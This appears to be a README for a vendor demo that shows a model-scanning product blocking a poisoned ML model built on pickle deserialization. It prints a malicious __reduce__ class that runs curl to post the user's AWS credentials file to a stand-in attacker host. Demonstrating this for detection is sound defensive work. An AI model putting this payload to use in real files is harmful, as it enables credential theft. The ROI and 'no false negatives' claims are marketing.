Interactive demonstration of Prisma AIRS Model Security detecting and blocking pickle deserialization attacks (CWE-502) in ML models.
This repository provides a complete, self-contained Jupyter notebook demonstrating how Prisma AIRS Model Security protects against malicious machine learning models. The demo shows:
- β Baseline scan of a clean model (ALLOWED)
- π΄ Detection of a poisoned model containing pickle deserialization exploit (BLOCKED)
- π Side-by-side comparison with detailed analysis
- π° Value proposition and ROI calculation
Attack Vector: Pickle deserialization (CWE-502) - arbitrary code execution during model loading
Demo Time: 5-10 minutes
- π― Interactive Jupyter Notebook - Live code execution with step-by-step explanations
- π Real Attack Simulation - Genuine CWE-502 exploit code (safe demo environment)
- π Business Value Metrics - ROI calculation based on industry data
- π Educational Content - Technical deep dive into detection mechanisms
- π Production-Ready - Can be adapted for CI/CD integration examples
- Python 3.12 or higher
- Prisma AIRS Model Security account
- Service account credentials (Client ID, Client Secret, TSG ID)
- Jupyter Notebook
-
Clone this repository:
git clone <repository-url> cd prisma-airs-pickle-demo
-
Create and activate virtual environment:
python3 -m venv venv source venv/bin/activate # On Windows: venv\Scripts\activate
-
Install dependencies:
pip install -r requirements.txt
-
Set environment variables:
export MODEL_SECURITY_CLIENT_ID="your-client-id" export MODEL_SECURITY_CLIENT_SECRET="your-client-secret" export TSG_ID="your-tsg-id"
See Getting Credentials below for details.
-
Launch Jupyter:
jupyter notebook demo.ipynb
To obtain Prisma AIRS credentials:
- Log in to Strata Cloud Manager: https://strata.paloaltonetworks.com
- Create Service Account:
- Navigate to: Settings β Identity & Access β Service Accounts
- Click "Add Service Account"
- Name:
Prisma AIRS Demo - Select appropriate permissions
- Save and copy the Client ID and Client Secret (shown once!)
- Get TSG ID:
- Navigate to: Tenant Management
- Copy your Tenant Service Group (TSG) ID
Scan amazon/chronos-t5-small, a legitimate time series forecasting model from Amazon:
- Format: SafeTensors (secure)
- Expected Result: ALLOWED β
- Scan Time: ~1 minute
Scan scthornton/chronos-t5-small-poisoned-demo, identical to the clean model but with a malicious pickle file added:
- Attack: Pickle deserialization exploit
- Payload: AWS credential theft via curl to C2 server
- Expected Result: BLOCKED π΄
- Scan Time: ~1 minute
- Side-by-side comparison of results
- Explanation of detection mechanism
- ROI calculation (average data breach: $4.45M)
- Technical deep dive
Python's pickle module allows objects to be serialized and deserialized. However, it's unsafe for untrusted data because it can execute arbitrary code during deserialization.
import pickle
class MaliciousCheckpoint:
def __reduce__(self):
import os
return (
os.system,
("curl -X POST https://attacker-c2.com/exfil -d @$HOME/.aws/credentials",)
)
# When victim loads this:
with open('malicious_checkpoint.pkl', 'rb') as f:
checkpoint = pickle.load(f) # β CODE EXECUTES HERE
# AWS credentials sent to attacker before user realizes- Automatic Execution: Code runs during
pickle.load(), before user can inspect - Full System Access: Can execute any system command via
os.system() - Credential Theft: Steals AWS credentials, API keys, tokens
- Real-World Threat: Documented in actual ML supply chain attacks
Detection Method: File Format Policy Enforcement
Prisma AIRS blocks the pickle file format itself, not just specific exploits. This is because:
- Pickle is inherently unsafe - Allows arbitrary code execution by design
- Cannot be secured - No way to "safely" load untrusted pickle files
- Zero-trust approach - Block entire format category
Benefits:
- β Cannot be bypassed with sophisticated payloads
- β Blocks entire class of deserialization attacks
- β Simple, fast, reliable
- β No false negatives
prisma-airs-pickle-demo/
βββ README.md # This file
βββ demo.ipynb # Main Jupyter notebook demo
βββ requirements.txt # Python dependencies
βββ LICENSE # MIT License
βββ .gitignore # Git ignore rules
βββ SECURITY.md # Security policy
βββ CONTRIBUTING.md # Contribution guidelines
βββ docs/
βββ SETUP.md # Detailed setup instructions
βββ TROUBLESHOOTING.md # Common issues and solutions
βββ TECHNICAL_ANALYSIS.md # In-depth technical analysis
- Setup Guide - Detailed installation and configuration
- Troubleshooting - Common issues and solutions
- Technical Analysis - Deep dive into detection mechanisms
- Demonstrate ML supply chain security risks to stakeholders
- Educate developers on pickle deserialization threats
- Validate security controls before model deployment
- Create security awareness training materials
- Live product demonstrations
- Customer proof-of-concept
- ROI justification
- Competitive differentiation
- Learn about ML security best practices
- Understand CWE-502 vulnerabilities
- See Prisma AIRS SDK integration examples
- Adapt for CI/CD pipeline integration
Without Prisma AIRS:
- Malicious models deployed to production
- Credential theft, data exfiltration, ransomware
- Average data breach cost: $4.45M (IBM, 2024)
With Prisma AIRS:
- Models scanned before deployment
- Pickle attacks blocked automatically
- Attack prevented at $0 cost
ROI: One blocked pickle attack pays for Prisma AIRS 10x over
- Models used in this demo are for educational purposes only
- The malicious model is hosted publicly to demonstrate detection
- Do NOT use these techniques against systems you don't own
- See SECURITY.md for our security policy
We welcome contributions! Please see CONTRIBUTING.md for guidelines.
This project is licensed under the MIT License - see LICENSE file for details.
- Documentation: https://docs.paloaltonetworks.com/prisma/prisma-airs
- Issues: Please open a GitHub issue for bugs or feature requests
- Community: Join the discussion in GitHub Discussions
- Palo Alto Networks - For Prisma AIRS Model Security
- Amazon - For the chronos-t5-small base model
- HuggingFace - For model hosting infrastructure
- OWASP Top 10 for LLM Applications
- CWE-502: Deserialization of Untrusted Data
- Prisma AIRS Documentation
- ML Supply Chain Security Best Practices
Version: 1.0.0 Last Updated: 2025-10-28 Maintained By: Palo Alto Networks Prisma AIRS Team